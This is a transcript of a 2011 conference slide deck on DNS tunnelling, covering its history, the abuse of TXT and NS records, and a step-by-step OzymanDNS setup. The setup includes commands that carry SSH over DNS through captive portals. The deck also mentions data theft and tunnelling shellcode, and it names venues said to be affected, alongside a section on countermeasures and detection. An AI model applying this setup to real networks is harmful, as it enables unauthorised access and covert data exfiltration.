SlideShare a Scribd company logo

Dns tunnelling its all in the name

Security BSides London
Security BSides London

BSidesLondon 20Th April 2011 - Arron "finux" Finnon --------------------------------------------------------------------- The presentations aim is to talk about how simple it is to deploy DNS Tunnelling infrastructure at little or no cost. Also shows how to establish a ssh connection from target to attacker, and act as a taster for peoples further research. ----- for more about @F1nux go to www.finux.co.uk

Technology
1 of 31
DNS Tunnelling, its all in the name! Arron “finux” Finnon finux@finux.co.uk http://www.finux.co.uk
Okay, DNS Tunnelling sounds a little complicated. You won't need a hard hat, a shovel or a drill, but you will need a shell account on a system which allows you control over port 53
However, it is very likely that it is illegal unless it is in your own test environment
So who am I, and why am I here? I ask the question every morning, I still haven't answered it, but I maybe able to answer it for you My Name is Arron, I have been involved in ethical hacking for a number of years. I'm currently at The University of Abertay Dundee as a student. I have spent sometime as a security consultant, and independent researcher. I have a reputation as being a little bit of a media/attention whore. I agree with that statement, so much so that I have a weekly podcast talking about geeky things: Finux Tech Weekly I have over the years gave a number of talks on a range of things related to hacking and security.
So where can you find me? Email – finux@finux.co.uk Twitter – www.twitter.com/f1nux & www.twitter.com/finuxtechweekly Facebook – www.facebook.com/finux Podcast Site – www.finux.co.uk Skype – finux1
Talk Out Line The History Involved Technical Overview Tools Available Those that “Bob” told me are effected A short how to on one set-up/configuration option Other potential uses for DNS Tunnelling Countermeasures Links Q&A
Disclaimer Without doubt the legal implications of using the discussed techniques are immense. If you use this to obtain “Free Internet”, I would point out that if you go to JAIL its not very free, and of course it could quite possibly cost you a career too. If you have any doubt about the legalities of what you are doing then STOP it. If you do use this to break the law, and you do get caught. Your totally on your own, this is for educational purposes only. Feel free to let me know though, it will make a great anicdote and I'm happy to write to you during your stay. However as usual to defend we must know how to attack. “The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.” - Sun Tzu Not if the hacker comes, but when they come......
Intended Audience Here's the shock! Hackers! However I mean the playful advocates of technology when I use that term. I tend not to buy into the media definition of it. What I mean by hacker is; playful advocates of technology. If technical things excite you, then this is for you. I love security, i love hacking, i love taking things apart and i believe its a prerequisite for our trade. As a good friend of mine, who is now the chief of operations for first base. A long haired geek that goes by the name of Pete Wood; if you wern't electoricuted by the age of 10 this might not be the trade for you. I'm proud to say i was shocked by 6, and I'll hazard a guess I'm not the only one in this room.
A Small Intro In September 2000 a post came across the Slashdot website informing its readers of an interesting use of DNS tunnelling for breaking out of locked down networks. It utilises that most networks regardless of their firewall, or their Access Controls Lists, would allow DNS look ups. Researchers found with crafted packets that they could in fact establish bi-direction IP traffic, they delivered a protocol named NSTX. However this concept became more widely established when the respected DNS security researcher Dan Kaminsky, released his Ozyman tool at Black hat in 2005, Kaminsky who in 2010 became one of ICANN's Trusted Community Representatives for the DNSSEC root certificate, has an unparalleled reputation when it comes to DNS security and it insecurities. Needless to say this release caught the attention of many security researchers, however worrying nearly 11 years after the discovery and 6 years since Kaminsky's Ozyman tool release, this vulnerability still lives on in a number of networks. All though DNS tunnelling could be seen as way to obtain free Internet on captive portals, it is also an effective tool in data theft. However it is hard to imagine the limitations when this is mixed with shellcode's. DNS tunnelling could be used to reverse connect a shellcode from target to attacker, the tunnel's effectiveness of traversing NAT makes it a worthy deployment.
Some History So 1987 the the domain name protocol basically came into life, it was defined in the the RFC 1035. It superseded RFCs 882, 883, and 973. Around 13 years later a group of hackers started playing around with the concept of DNS tunnelling. Mainly due to gain free internet from a Microsoft update PPP dailin's. Most of these Microsoft PPP dialins allow you to use a Name server. These hackers later developed "NSTX Protocol", meaning "Name server Transfer Protocol" in doing so they finally managed to use one of Microsoft toll free numbers in Germany and tunnel their net connection over it. Iodine later became popular due to its password authentication however it was still very similar to NSTX. However as i have said i think it fair to say that the concept grabbed more attention when respected breaker of DNS Dan Kaminsky released a set of scripts at Black Hat 2005 which were written in perl and in reality very easy to deploy. For the purpose of today's talk i will focus on OzymanDNS
Technical Overview Now we could take this from the stand point of a captive portal, which normally intercepts all web traffic until some sort of authentication is achieved. However we see regularly that a they still enable DNS enquiries. I way to check this on a captive portal would be to use either dig or nslookup if your running windows. If you are issued a private address then your out of luck, however if you receive the IP address of the domain name in question then DNS requests are allowed out. So if we revisit the Domain Name Systems set-up, we'll see that it has 13 root domain name servers responsible for the .com's, .org's, so on and so forth known as the Top Level Domain names or TLD for short. They are responsible down to the root domain such as example.com, then from there sub domains are delegated to their own server. Such as test.example.com. Each domain is configured in a zone file, and each zone file has a number of records configured within it. So an example would be an A record which stands for an address record, or a CNAME alias for an A record, we could see a MX record for handling mail, a NS record which points to a new DNS Server for that sub-domain, or a TXT record which handles text descriptions. It is the last two records that interest us.
Technical Overview A hostname can only be 255 octets long, or 255 bytes. In addition a TXT record can also only be 255 bytes. So it lies within these 255 byte TXT records the potential for us to deliver a payload of data back within one of these records. If we could encode a formatted domain name request up to a maximum of 255 bytes, and then have that decoded back at our fake domain name server. Our fake domain name server could encode our response back and deliver that via a TXT record we now see the very plausible avenue of transmitting data.
Technical Overview So what we would need in this situation is a fake domain name server listening on port 53, which will respond to requests, and a hostname which is in fact a delegated NS record pointing to a fake DNS Server. An example would be; inbound.example.com would point to server.inbound.example.com The zone file could look like this; inbound.example.com NS server.inbound.example.com server.inbound.example.com A 92.35.18.118 The A record would point to our fake domain name server, and our client would make its requests to the inbound sub-domain. Of course if you where using DynDNS.org it could be a simple as inbound.example.com NS finux.dyndns.org
Technical Overview Now a free account at DynDNS.org does not allow you to delegate Name Servers. However freedns.afraid.org does. I happen to prefer the update client(s) on DynDNS, so I personally go for a freedns.afraid.org and point it to a DynDNS account. Personally I think this makes the set-up slightly more easier, and gives it an edge of portability. Now all DNS Tunnelling set-ups in some way use the delegated Name Servers. Now I admit I'm a Linux jock and so this configuration is based on my experience with Linux, there is some links on how to do this with a Windows set-up at the end. My advice to you would be to build a Virtual Machine either running Ubuntu/Debian which of course will make its deployment in your test environment pretty easy.
Technical Overview As I have said for today's purpose we'll be looking at Kaminsky's OzymanDNS tool, in fact its a revised revision of it. OzymanDNS is broken down into 4 perl scripts. The server script is named nomde.pl which listens on a privileged port and in doing so requires sufficient permissions to do it; sudo ./nomde.pl -i 0.0.0.0 inbound.example.com The above command would set OzymanDNS server section to listen to all requests on the sub-domain inbound.example.com
Technical Overview Now the OzymanDNS client is written to encode/decode and send the responses back via STDOUT which isn't overly useful however combined with the SSH config option "ProxyCommand" enables the ease of use this set of scripts has become renowned for. ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com" user@localhost The upstream data sent out will be encoded using Base32. After the data has been transmitted, there is a unique ID due to some DNS requests taking longer than others, the UDP protocol has no methods to check this. and either one of the keywords up or down, indicating whether the traffic's up- or downstream. Here is what an example request could look like; ntez375sy2qk7jsg2og3eswo2jujscb3r43as6m6hl2wsxobm7h2olu4tmaq.ly azbf2e2rdynrd3fldvdy2w3tifigy2csrx3cqczxyhnxygor72a7fx47uo.nwqy4o a3v5rx66b4aek5krzkdm5btgz6jbiwd57ubnohnknpcuybg7py.63026-0.id- 32227.up.sshdns.inbound.example.com
Technical Overview The response comes as a DNS TXT record. A TXT record can hold arbitrary ASCII data and can hold upper-case letters as well as lower- case letters and numbers. So the responses come encoded with Base64 encoded. Such a response might look like the this. 695-8859.id-39201.down.sshdns.inbound.example.com. 0 IN TXT "AAAAlAgfAAAAgQDKrd3sFmf8aLX6FdU8ThUy3SRWGhotR6EsAavqH gBzH2khqsQHQjEf355jS7cT G+4a8kAmFVQ4mpEEJeBE6IyDWbAQ9a0rgOKcsaWwJ7GdngGm9jpv ReXX7S/2oqAIUFCn0M8=" "MHw9tR0kkDVZB7RCfCOpjfHrir7yuiCbt7FpyX8AAAABBQAAAAAAAAA A"
Technical Overview So a quick recap of what is needed on our Debian like system. We we need to install some perl packages; sudo apt-get install screen libnet-dns-perl libmime-base32-perl In addition you may want to install ddclient as well and configure your dynamic sub-domain to point to the server. You'll also need to set-up SSH as well You will want to download the OzymanDNS scripts, I have made the latest version available on my site. wget http://finux.co.uk/demos/software/OzymanDNS-Splitbrain-Version.tar.gz Now as I have said the version of OzymanDNS is revised and the code cleaned up by Andreas Gohr of the Splitbrain.org website http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple
Technical Overview Our client configuration is as follows; sudo apt-get install libnet-dns-perl libmime-base32-perl And then a simple command command ssh -o ProxyCommand="./droute.pl sshdns.inbound.example.com" user@localhost
Tools Available Iodine is based on NSTX as i have mentioned is a Linux only tool, however it works via producing a virtual network interface on the server and client, and those two virtual interfaces communicate with each other. Netcross is a little modular tool that might be useful in restricted network connections DNSCat is the basically NetCat for DNS
Those that “Bob” told me are effected The Cloud Network – Such as the one's that cover Weatherspoons pubs and McDonald's BT Open Zone A certain University in North East Scotland – Which will soon be fixed Interestingly over 3g it has been reported that T-Mobile allow unfettered DNS queries. This could in fact be false, however if its true then really quite scary. Eastern Trains Remember its easily tested, a nslookup or a dig should tell you within seconds. Even if ping is blocked there is a good chance you could use that to determine if the next work is vulnerable to attack, as it will still obtain an IP address
Other potential uses of DNS Tunnelling As discussed covert communications over an otherwise restricted channel. Data theft, as in you do not allow any SSH, FTP, SFTP so on and so forth. scp works with the OzymanDNS set-up By far the craziest I have seen is to deliver shell code via DNS Tunnel's. The interesting concept with tunnelling a shellcode over DNS is for starters this happens to null in void any potential NAT issues There is already a fair few PoC that highlight this concept. I have been reading of recent how we could use some of the Metasploit payloads, combined with DNSCat I have not had time to play anywhere near as much with this as I would have liked too. But needless to say I'm sure I'll get my chance
Countermeasures The best way of detecting DNS tunnelling is by performing statistical anomaly detection on the network. Some characteristics of a DNS tunnel include: High volume of DNS requests from internal clients where little usually take place Significant difference in the format of these lookups as compared to regular ones i.e. Base32 and Base64 The total amount of data transferred over port 53 is much higher than usual DNS Tunnelling could actually be one of the best covert channels ever designed. In general, it proves quite challenging to stop this traffic, as there is no specific indication that it concerns IP over DNS tunnelling. There are however a number of ways to mitigate the threat to a certain degree.
Countermeasures If you are running a for-a-fee access point, consider having your DNS server answer all queries with a local IP address until payment has been completed. Only afterwards should a client be able to perform DNS lookups that your server resolves to the internet. Many organizations do this currently by having HTTP requests rewritten to a local web server on which payment is due. This however still allows the client to resolve external domains, and as such, does not alleviate the covert channel. A potential solution is to set up a BIND server which has a local entry for all TLD's: get lists here and here. Set up a wildcard entry for each of these domains that points to your local web server that processes payments. Requests to any other domains or zones should not be handled recursively.
Countermeasures One solution which is sometimes considered is to deny all queries for TXT records. The impact of this will in most cases would be limited, although certain functionality (such as SPF) may break. In general, only your incoming mail server will need to perform these lookups: taken a general split-DNS service on multiple servers, it should be feasible to work around this issue. There are precious little reasons why the average internal client should be able to perform lookups for TXT records. This approach is however fairly naive as tunnelling will still be possible through other record types. You will not be able to disable these others, such as CNAME, due to the heavy production impact. Remember blocking a domain name with X amount of calls within a period seems a good idea, until you think about the lookups your organisation makes to google in an hour
Conclusions In conclusion I haven't really scratched the surface of what can be done here. The reality of it is, if your not looking at DNS traffic then someone may well be doing so. Its has the potential to be still one of the best covert channel's going and can be very technically difficult to detect. The uses for this are really limited by your imagination. If you can use this with 3g technology then this could make somewhat of a lethal weapon. However some pre-thought of what you could and should expect on your network You may think this connection would be slow, but within my links is a paper showing that speeds of up to 110 kilobytes a second
Links Slashdot article on NSTX. http://slashdot.org/articles/00/09/10/2230242.shtml Kaminsky's Wikipedia page http://en.wikipedia.org/wiki/Dan_Kaminsky Kaminsky Release of the Tools he developed http://dankaminsky.com/2004/07/29/51/ Kaminsky's Black Hat paper http://www.doxpara.com/slides/BH_EU_05-Kaminsky.pdf Dan Kaminsky's 2005 Black hat talk http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple Very good guide on setting up DNS Tunnels http://dnstunnel.de/ IVC Wikipedia article on DNS tunnelling http://beta.ivc.no/wiki/index.php/DNS_Tunneling
Links Another further guide to tunnelling DNS http://www.h-i-r.net/2010/03/dns-tunneling-part-1-intro-and.html PDF paper from Black hat http://www.blackhat.com/presentations/bh-usa-08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdf Heyoka paper http://shakacon.org/talks/Revelli-Leidecker_Heyoka.pdf Further guide to making to configuring OzymanDNS, however for Windows type systems http://cyberphob1a.wordpress.com/2008/02/10/dns-tunneling-part-i/ http://cyberphob1a.wordpress.com/2008/02/11/speeding-up-dns-tunneling/ http://cyberphob1a.wordpress.com/2008/03/08/dns-tunneling-updated-source/ DNS RFC ftp://ftp.rfc-editor.org/in-notes/rfc1035.txt
Links Another set of software for TCP over DNS this one using Java instead of perl http://analogbit.com/tcp-over-dns_howto For Presentation Side Notes – Speeding Firefox for Low Bandwidth carriers http://www.ghacks.net/2008/07/13/optimize-firefox-for-low-traffic-volumes/ DNScat as a Payload with Metasploit http://www.skullsecurity.org/blog/2010/weaponizing-dnscat-with-shellcode-and-metasploit Reverse DNS Tunneling Shellcode (v0.3) Technical Details http://projectshellcode.com/?q=node/2 In the following tutorial, we will use the tool dns2tcp written by two guys working for HSC, a French security company. http://blog.rootshell.be/2007/03/22/dns2tcp-how-to-bypass-firewalls-or-captive-portals/ http://www.hsc.fr/ressources/outils/dns2tcp/download/ Traffic analysis approach to detecting DNS tunnels http://blog.vorant.com/2006/05/traffic-analysis-approach-to-detecting.html Tunneling shit over DNS http://www.modacity.net/forums/showthread.php?19755-Tunneling-shit-over-DNS
Questions & Answers ?
Thank You For Your Time I hope it has been of interest Please feel free to come grab me later for a chat Don't forget to listen to the show www.finux.co.uk On a side note, I have never been on a night out in London. So I'll apologise for tonight tomorrow morning

Recommended

DNS Attacks
DNS AttacksDNS Attacks
DNS AttacksHimanshu Prabhakar
 
Domain Name System
Domain Name SystemDomain Name System
Domain Name SystemGurkamal Rakhra
 
DNS Presentation
DNS PresentationDNS Presentation
DNS PresentationShubham Srivastava
 
DNS spoofing/poisoning Attack Report (Word Document)
DNS spoofing/poisoning Attack Report (Word Document)DNS spoofing/poisoning Attack Report (Word Document)
DNS spoofing/poisoning Attack Report (Word Document)Fatima Qayyum
 
Presentation on Domain Name System
Presentation on Domain Name SystemPresentation on Domain Name System
Presentation on Domain Name SystemChinmay Joshi
 
Dns ppt
Dns pptDns ppt
Dns pptBizuworkk Jemaneh
 
Domain name system
Domain name systemDomain name system
Domain name systemSiddharth Chandel
 
Domain Name Service
Domain Name ServiceDomain Name Service
Domain Name Servicewebhostingguy
 

Recommended

DNS Attacks
DNS AttacksDNS Attacks
DNS AttacksHimanshu Prabhakar
 
Domain Name System
Domain Name SystemDomain Name System
Domain Name SystemGurkamal Rakhra
 
DNS Presentation
DNS PresentationDNS Presentation
DNS PresentationShubham Srivastava
 
DNS spoofing/poisoning Attack Report (Word Document)
DNS spoofing/poisoning Attack Report (Word Document)DNS spoofing/poisoning Attack Report (Word Document)
DNS spoofing/poisoning Attack Report (Word Document)Fatima Qayyum
 
Presentation on Domain Name System
Presentation on Domain Name SystemPresentation on Domain Name System
Presentation on Domain Name SystemChinmay Joshi
 
Dns ppt
Dns pptDns ppt
Dns pptBizuworkk Jemaneh
 
Domain name system
Domain name systemDomain name system
Domain name systemSiddharth Chandel
 
Domain Name Service
Domain Name ServiceDomain Name Service
Domain Name Servicewebhostingguy
 
DNS spoofing/poisoning Attack
DNS spoofing/poisoning AttackDNS spoofing/poisoning Attack
DNS spoofing/poisoning AttackFatima Qayyum
 
DNS Security
DNS SecurityDNS Security
DNS Securityjohnmcclure00
 
Port forwarding
Port forwardingPort forwarding
Port forwardingRonak Mehta
 
Network attached storage (nas)
Network attached storage (nas)Network attached storage (nas)
Network attached storage (nas)Vîvék Thørät
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Dns security
Dns securityDns security
Dns securityDhaval Kapil
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and securityMichael Earls
 
Presentation on dns
Presentation on dnsPresentation on dns
Presentation on dnsAnand Grewal
 
DNS (Domain Name System)
DNS (Domain Name System)DNS (Domain Name System)
DNS (Domain Name System)Shashidhara Vyakaranal
 
03 bit locker-mod03
03 bit locker-mod0303 bit locker-mod03
03 bit locker-mod03António Barroso
 
Footprinting
FootprintingFootprinting
FootprintingDuah John
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hackingleminhvuong
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name SystemPeter R. Egli
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teamingn|u - The Open Security Community
 
Ransomware: Wannacry
Ransomware: WannacryRansomware: Wannacry
Ransomware: WannacryMikel Solabarrieta
 
How to configure dns server(2)
How to configure dns server(2)How to configure dns server(2)
How to configure dns server(2)Amandeep Kaur
 
Domain Name System DNS
Domain Name System DNSDomain Name System DNS
Domain Name System DNSAkshay Tiwari
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Proxy
ProxyProxy
ProxyTriad Square InfoSec
 
Network tunneling techniques
Network tunneling techniquesNetwork tunneling techniques
Network tunneling techniquesinbroker
 
Advanced DNS Protection
Advanced DNS ProtectionAdvanced DNS Protection
Advanced DNS ProtectionSrikrupa Srivatsan
 

More Related Content

What's hot

DNS spoofing/poisoning Attack
DNS spoofing/poisoning AttackDNS spoofing/poisoning Attack
DNS spoofing/poisoning AttackFatima Qayyum
 
Network attached storage (nas)
Network attached storage (nas)Network attached storage (nas)
Network attached storage (nas)Vîvék Thørät
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and securityMichael Earls
 
Presentation on dns
Presentation on dnsPresentation on dns
Presentation on dnsAnand Grewal
 
Footprinting
FootprintingFootprinting
FootprintingDuah John
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hackingleminhvuong
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name SystemPeter R. Egli
 
How to configure dns server(2)
How to configure dns server(2)How to configure dns server(2)
How to configure dns server(2)Amandeep Kaur
 
Domain Name System DNS
Domain Name System DNSDomain Name System DNS
Domain Name System DNSAkshay Tiwari
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 

What's hot (20)

DNS spoofing/poisoning Attack
DNS spoofing/poisoning AttackDNS spoofing/poisoning Attack
DNS spoofing/poisoning Attack
 
DNS Security
DNS SecurityDNS Security
DNS Security
 
Port forwarding
Port forwardingPort forwarding
Port forwarding
 
Network attached storage (nas)
Network attached storage (nas)Network attached storage (nas)
Network attached storage (nas)
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
Dns security
Dns securityDns security
Dns security
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and security
 
Presentation on dns
Presentation on dnsPresentation on dns
Presentation on dns
 
DNS (Domain Name System)
DNS (Domain Name System)DNS (Domain Name System)
DNS (Domain Name System)
 
03 bit locker-mod03
03 bit locker-mod0303 bit locker-mod03
03 bit locker-mod03
 
Footprinting
FootprintingFootprinting
Footprinting
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hacking
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name System
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Ransomware: Wannacry
Ransomware: WannacryRansomware: Wannacry
Ransomware: Wannacry
 
How to configure dns server(2)
How to configure dns server(2)How to configure dns server(2)
How to configure dns server(2)
 
Domain Name System DNS
Domain Name System DNSDomain Name System DNS
Domain Name System DNS
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Proxy
ProxyProxy
Proxy
 

Viewers also liked

Network tunneling techniques
Network tunneling techniquesNetwork tunneling techniques
Network tunneling techniquesinbroker
 
Drilling Down Into DNS DDoS
Drilling Down Into DNS DDoSDrilling Down Into DNS DDoS
Drilling Down Into DNS DDoSAPNIC
 
The DNS Tunneling Blindspot
The DNS Tunneling BlindspotThe DNS Tunneling Blindspot
The DNS Tunneling BlindspotBrian A. McHenry
 
DNS Security
DNS SecurityDNS Security
DNS Securityinbroker
 
CNIT 40: 1: The Importance of DNS Security
CNIT 40: 1: The Importance of DNS SecurityCNIT 40: 1: The Importance of DNS Security
CNIT 40: 1: The Importance of DNS SecuritySam Bowne
 
DNS Security Presentation ISSA
DNS Security Presentation ISSADNS Security Presentation ISSA
DNS Security Presentation ISSASrikrupa Srivatsan
 
Tunneling configuration
Tunneling configurationTunneling configuration
Tunneling configurationNaranont Atima
 
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS AttacksDNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS AttacksFindWhitePapers
 
Pseudo Random DNS Query Attacks and Resolver Mitigation Approaches
Pseudo Random DNS Query Attacks and Resolver Mitigation ApproachesPseudo Random DNS Query Attacks and Resolver Mitigation Approaches
Pseudo Random DNS Query Attacks and Resolver Mitigation ApproachesAPNIC
 
Fast flux hosting and DNS
Fast flux hosting and DNSFast flux hosting and DNS
Fast flux hosting and DNSamiable_indian
 
Botconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server DetectionBotconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server DetectionSensePost
 
Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...
Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...
Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...APNIC
 
OpenDNS Whitepaper: DNS's Role in Botnet C&C
OpenDNS Whitepaper: DNS's Role in Botnet C&COpenDNS Whitepaper: DNS's Role in Botnet C&C
OpenDNS Whitepaper: DNS's Role in Botnet C&CCourtland Smith
 
Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...
Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...
Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...Paladion Networks
 
Introduction of Mirai Translate, Inc.
Introduction of Mirai Translate, Inc. Introduction of Mirai Translate, Inc.
Introduction of Mirai Translate, Inc. Osaka University
 
Dns reflection attacks webinar slides
Dns reflection attacks webinar slidesDns reflection attacks webinar slides
Dns reflection attacks webinar slidesMen and Mice
 

Viewers also liked (20)

Network tunneling techniques
Network tunneling techniquesNetwork tunneling techniques
Network tunneling techniques
 
Advanced DNS Protection
Advanced DNS ProtectionAdvanced DNS Protection
Advanced DNS Protection
 
Drilling Down Into DNS DDoS
Drilling Down Into DNS DDoSDrilling Down Into DNS DDoS
Drilling Down Into DNS DDoS
 
The DNS Tunneling Blindspot
The DNS Tunneling BlindspotThe DNS Tunneling Blindspot
The DNS Tunneling Blindspot
 
DNS Security
DNS SecurityDNS Security
DNS Security
 
Security of DNS
Security of DNSSecurity of DNS
Security of DNS
 
CNIT 40: 1: The Importance of DNS Security
CNIT 40: 1: The Importance of DNS SecurityCNIT 40: 1: The Importance of DNS Security
CNIT 40: 1: The Importance of DNS Security
 
DNS Security Presentation ISSA
DNS Security Presentation ISSADNS Security Presentation ISSA
DNS Security Presentation ISSA
 
Tunneling configuration
Tunneling configurationTunneling configuration
Tunneling configuration
 
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS AttacksDNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
 
Pseudo Random DNS Query Attacks and Resolver Mitigation Approaches
Pseudo Random DNS Query Attacks and Resolver Mitigation ApproachesPseudo Random DNS Query Attacks and Resolver Mitigation Approaches
Pseudo Random DNS Query Attacks and Resolver Mitigation Approaches
 
I pv6 for cmu
I pv6 for cmuI pv6 for cmu
I pv6 for cmu
 
Fast flux hosting and DNS
Fast flux hosting and DNSFast flux hosting and DNS
Fast flux hosting and DNS
 
Fast flux
Fast fluxFast flux
Fast flux
 
Botconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server DetectionBotconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server Detection
 
Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...
Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...
Water Torture: A Slow Drip DNS DDoS Attack on QTNet by Kei Nishida [APRICOT 2...
 
OpenDNS Whitepaper: DNS's Role in Botnet C&C
OpenDNS Whitepaper: DNS's Role in Botnet C&COpenDNS Whitepaper: DNS's Role in Botnet C&C
OpenDNS Whitepaper: DNS's Role in Botnet C&C
 
Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...
Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...
Early Detection of Malicious Flux Networks via Large Scale Passive DNS Traffi...
 
Introduction of Mirai Translate, Inc.
Introduction of Mirai Translate, Inc. Introduction of Mirai Translate, Inc.
Introduction of Mirai Translate, Inc.
 
Dns reflection attacks webinar slides
Dns reflection attacks webinar slidesDns reflection attacks webinar slides
Dns reflection attacks webinar slides
 

Similar to Dns tunnelling its all in the name

Domain Name System
Domain Name SystemDomain Name System
Domain Name SystemWhoisXML API
 
Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)Dan Kaminsky
 
Phreebird Suite 1.0: Introducing the Domain Key Infrastructure
Phreebird Suite 1.0: Introducing the Domain Key InfrastructurePhreebird Suite 1.0: Introducing the Domain Key Infrastructure
Phreebird Suite 1.0: Introducing the Domain Key InfrastructureDan Kaminsky
 
DDoS mitigation in the real world
DDoS mitigation in the real worldDDoS mitigation in the real world
DDoS mitigation in the real worldMichael Renner
 
Black Ops of Fundamental Defense:
Black Ops of Fundamental Defense:Black Ops of Fundamental Defense:
Black Ops of Fundamental Defense:Recursion Ventures
 
Design Reviewing The Web
Design Reviewing The WebDesign Reviewing The Web
Design Reviewing The Webamiable_indian
 
Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Webroyans
 
DNS Over HTTPS by Michael Casadevall
DNS Over HTTPS by Michael CasadevallDNS Over HTTPS by Michael Casadevall
DNS Over HTTPS by Michael CasadevallGlenn McKnight
 
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon
(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception saconPriyanka Aash
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???trendy updates
 
Detecting dns-tunneling-34152
Detecting dns-tunneling-34152Detecting dns-tunneling-34152
Detecting dns-tunneling-34152huynhvanphuc
 
DNS как линия защиты/DNS as a Defense Vector
DNS как линия защиты/DNS as a Defense VectorDNS как линия защиты/DNS as a Defense Vector
DNS как линия защиты/DNS as a Defense VectorPositive Hack Days
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfsphanleson
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2phanleson
 

Similar to Dns tunnelling its all in the name (20)

Domain Name System
Domain Name SystemDomain Name System
Domain Name System
 
Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)Domain Key Infrastructure (From Black Hat USA)
Domain Key Infrastructure (From Black Hat USA)
 
Phreebird Suite 1.0: Introducing the Domain Key Infrastructure
Phreebird Suite 1.0: Introducing the Domain Key InfrastructurePhreebird Suite 1.0: Introducing the Domain Key Infrastructure
Phreebird Suite 1.0: Introducing the Domain Key Infrastructure
 
DDoS mitigation in the real world
DDoS mitigation in the real worldDDoS mitigation in the real world
